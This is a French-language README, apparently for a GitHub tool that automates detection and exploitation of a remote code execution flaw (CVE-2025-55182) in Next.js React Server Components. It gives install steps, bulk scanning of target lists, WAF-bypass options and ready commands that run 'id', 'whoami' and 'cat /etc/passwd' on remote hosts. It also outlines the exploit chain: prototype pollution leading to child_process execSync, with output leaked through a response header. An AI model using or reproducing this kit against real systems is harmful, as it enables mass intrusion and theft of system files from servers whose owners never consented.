
Kit automatisé de détection et d'exploitation pour CVE-2025-55182, une RCE critique dans Next.js React Server Components. Dispose d'une empreinte multi-couche, d'un contournement WAF et d'un scan en masse pour les tests d'intrusion.
Un outil complet de recherche en sécurité pour tester la vulnérabilité d'exécution de code à distance des composants serveur React de Next.js (CVE-2025-55182).
Cette boîte à outils fournit des capacités de détection et d'exploitation automatisées pour CVE-2025-55182, une vulnérabilité RCE critique affectant les applications Next.js utilisant les composants serveur React. La boîte à outils se compose de trois composants intégrés :
requestspip3 install requests
git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh
Le moyen le plus rapide de scanner et d'exploiter des cibles :
# Créez un fichier avec les URL cibles (une par ligne)
echo "https://example.com" > targets.txt
# Analyse et exploitation automatiques en une commande
./auto_exploit.sh -i targets.txt -s -c "id"
Identifier les applications Next.js sans exploitation :
python3 NextApp.py targets.txt
Fichiers de sortie :
confirmed_nextjs_targets.txt - Toutes les applications Next.js détectéeshigh_confidence_nextjs_targets.txt - Détections à haute confiance uniquementTester des cibles individuelles :
# Exploitation de base
./exploit.sh -d https://target.com -c "whoami"
# Avec contournement WAF
./exploit.sh -d target.com -c "cat /etc/passwd" -w
# Taille personnalisée du contournement WAF
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256
# Ignorer la vérification SSL
./exploit.sh -d https://target.com -c "id" -k
./auto_exploit.sh -i targets.txt -s -c "whoami"
# Étape 1 : Détecter les applications Next.js
python3 NextApp.py targets.txt
# Étape 2 : Exploiter les cibles confirmées
./auto_exploit.sh -c "id"
# Analyse automatique complète avec contournement WAF
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"
# Délais et délais d'attente personnalisés
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"
# Ignorer la vérification SSL en mode groupé
./auto_exploit.sh -i targets.txt -s -k -c "hostname"
python3 NextApp.py <fichier_cibles>
Arguments :
fichier_cibles - Fichier texte contenant les URL cibles (une par ligne)./exploit.sh [OPTIONS]
Options :
| Option | Description | Défaut |
|---|---|---|
-d, --domain | Domaine/URL cible | http://localhost:3000 |
-f, --file | Fichier avec la liste des cibles | - |
-c, --command | Commande à exécuter | id |
-w, --waf-bypass | Activer le contournement WAF | Désactivé |
--waf-size SIZE | Taille des données de contournement WAF (Ko) | 128 |
--timeout SECONDS | Délai d'attente de la requête | 15 |
-k, --insecure | Ignorer la vérification SSL | Désactivé |
--user-agent AGENT | User-Agent personnalisé | Mozilla/5.0... |
-h, --help | Afficher le message d'aide | - |
./auto_exploit.sh [OPTIONS]
Options :
| Option | Description | Défaut |
|---|---|---|
-i, --input FILE | Fichier d'entrée des cibles | confirmed_nextjs_targets.txt |
-o, --output FILE | Fichier de sortie des résultats | exploit_results.txt |
-c, --command CMD | Commande à exécuter | id |
-w, --waf-bypass | Activer le contournement WAF | Désactivé |
--waf-size SIZE | Taille du contournement WAF (Ko) | 128 |
--timeout SECONDS | Délai d'attente de la requête | 15 |
-k, --insecure | Ignorer la vérification SSL | Désactivé |
--delay SECONDS | Délai entre les requêtes | 2 |
-s, --scan | Analyser automatiquement pour Next.js d'abord | Désactivé |
-h, --help | Afficher le message d'aide | - |
Généré par NextApp.py - contient toutes les URL identifiées comme des applications Next.js.
Généré par NextApp.py - contient uniquement les détections Next.js à haute confiance (score de confiance 100+).
Généré par auto_exploit.sh - rapport d'exploitation complet comprenant :
Le scanner utilise plusieurs techniques de détection avec un système de notation de confiance :
x-nextjs-*, x-vercel-*x-powered-by: Next.js__NEXT_DATA__ (100 points)_next/* (25-75 points selon la quantité)__NEXT_DATA__, __NEXT_LOADED_PAGES__middlewareManifest, self.__RSC_MANIFESTSeuils de confiance :
L'exploit exploite une chaîne de pollution de prototype dans les composants serveur React de Next.js :
__proto__ via la désérialisation JSON_response._prefixprocess.mainModule.require('child_process').execSync()X-Action-RedirectLa boîte à outils inclut des capacités de contournement WAF intégrées :
Activer avec les drapeaux -w ou --waf-bypass.
# Créer la liste des cibles
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF
# Lancer le scan unifié
./auto_exploit.sh -i targets.txt -s -c "whoami"
# Consulter les résultats
cat exploit_results.txt
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256